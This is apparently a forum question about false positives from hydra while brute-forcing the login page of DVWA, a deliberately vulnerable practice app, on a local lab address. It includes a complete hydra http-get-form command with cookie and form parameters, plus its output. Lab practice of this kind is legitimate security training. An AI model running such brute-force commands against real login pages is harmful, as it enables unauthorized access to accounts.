# Brute forcing the brute force page on DVWA v1.0.7 using hydra

Tags: brute-force, hydra, dvwa

I am trying to brute force the brute force log-in page on DVWA v1.0.7 (`/dvwa/vulnerabilities/brute/`)

I have been working on this for quite some time but I keep getting a bunch of false positives when I use a wordlist I created and when I use the rockyou.txt.gz file, hydra just keeps going on and on without any results.

```
hydra 192.168.10.4 http-get-form "/dvwa/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=^Login^:F=username and/or password incorrect.:H=Cookie:security=low; PHPSESSID=a3e7228ab3c6fd126a8c2c752f00dfb9" -L username.txt -P passwords.txt
```

This is the result I get

```
[80][http-get-form] host: 192.168.10.4   login: admin   password: sdkjfbid
[80][http-get-form] host: 192.168.10.4   password: knfbjenh b
[80][http-get-form] host: 192.168.10.4   password: kfbiej
[80][http-get-form] host: 192.168.10.4   password: nvbjdfhvbkj
[80][http-get-form] host: 192.168.10.4   password: hytv
[80][http-get-form] host: 192.168.10.4   password: sdkjfbid
[80][http-get-form] host: 192.168.10.4   password: password
1 of 1 target successfully completed, 48 valid passwords found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2022-09-30 07:14:16
```

Is there something I am missing?

Comment: Have you looked up the many, many posts here about hydra false positives, including the one where you posted an answer? https://security.stackexchange.com/questions/195219/brute-forcing-dvwa-login-page-with-hydra If you did try the things on those other posts, what were the results? Have you considered changing the failure test to something that doesn't have a `/`?